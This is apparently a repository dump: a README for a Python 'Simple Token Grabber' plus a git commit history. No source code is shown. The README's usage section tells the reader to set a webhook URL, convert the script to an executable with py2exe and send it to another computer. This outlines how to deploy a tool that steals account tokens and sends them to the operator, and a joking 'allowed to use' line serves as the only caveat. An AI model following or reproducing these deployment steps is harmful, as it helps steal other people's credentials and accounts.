======================: FILES :======================
======================: README CONTENT :======================
[![Build Status](https://travis-ci.org/doge/wow.svg)](https://travis-ci.org/doge/wow)
[![Coverage Status](http://img.shields.io/coveralls/doge/wow.svg)](https://github.com/mayhaps0/bababooeybot)
[![License](http://img.shields.io/:license-mit-blue.svg)](http://doge.mit-license.org)
[![Badges](http://img.shields.io/:badges-69/96-ff6799.svg)](https://github.com/badges/badgerbadgerbadger)

# Simple Token Grabber

Simple token grabber using python

## Installation

Use the package manager [pip](https://pip.pypa.io/en/stable/) to install the requirements.

```bash
pip install -r requirements.txt
```

## Usage

```bash
1. Edit the webhook url
2. Use a python to exe converter such as py2exe
3. Send to a compooter that you are allowed to use
4. Enjoy!
```

## Contributing
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

## License
[MIT](https://choosealicense.com/licenses/mit/)
====================== GIT HISTORY: ======================
fddb32c HEAD@{0}: clone: from https://github.com/basedpill/TokenGrabber
commit fddb32c99defc7e645d765afe3d77a92be9c71ec
Author: mayhaps <69280798+mayhapsDev@users.noreply.github.com>
Date:   Sun Feb 14 18:47:01 2021 +0000

    Changed names

commit 8b2f7238b66980ef5760e25d0b11c603631090b0
Author: mayhaps <69280798+mayhapsDev@users.noreply.github.com>
Date:   Sun Feb 14 17:36:02 2021 +0000

    Update README.md

commit af0d7f4e1c54b04e86d39ade600011ec57a331a5
Author: mayhaps <69280798+mayhaps0@users.noreply.github.com>
Date:   Mon Aug 17 17:08:31 2020 +0100

    Added Comments

commit 021baf7dc1695f69cafb6fa6e55602140a5781b2
Author: mayhaps <69280798+mayhaps0@users.noreply.github.com>
Date:   Mon Aug 17 17:05:55 2020 +0100

    Add files via upload

commit 38670aa5d9c9061dd4a1bfba7a7ceb747492ab0b
Author: mayhaps <69280798+mayhaps0@users.noreply.github.com>
Date:   Mon Aug 17 16:44:58 2020 +0100

    Update README.md

commit 03fe17002030388e9cda3bacde09c062de8ed408
Author: mayhaps <69280798+mayhaps0@users.noreply.github.com>
Date:   Mon Aug 17 16:44:34 2020 +0100

    Initial commit
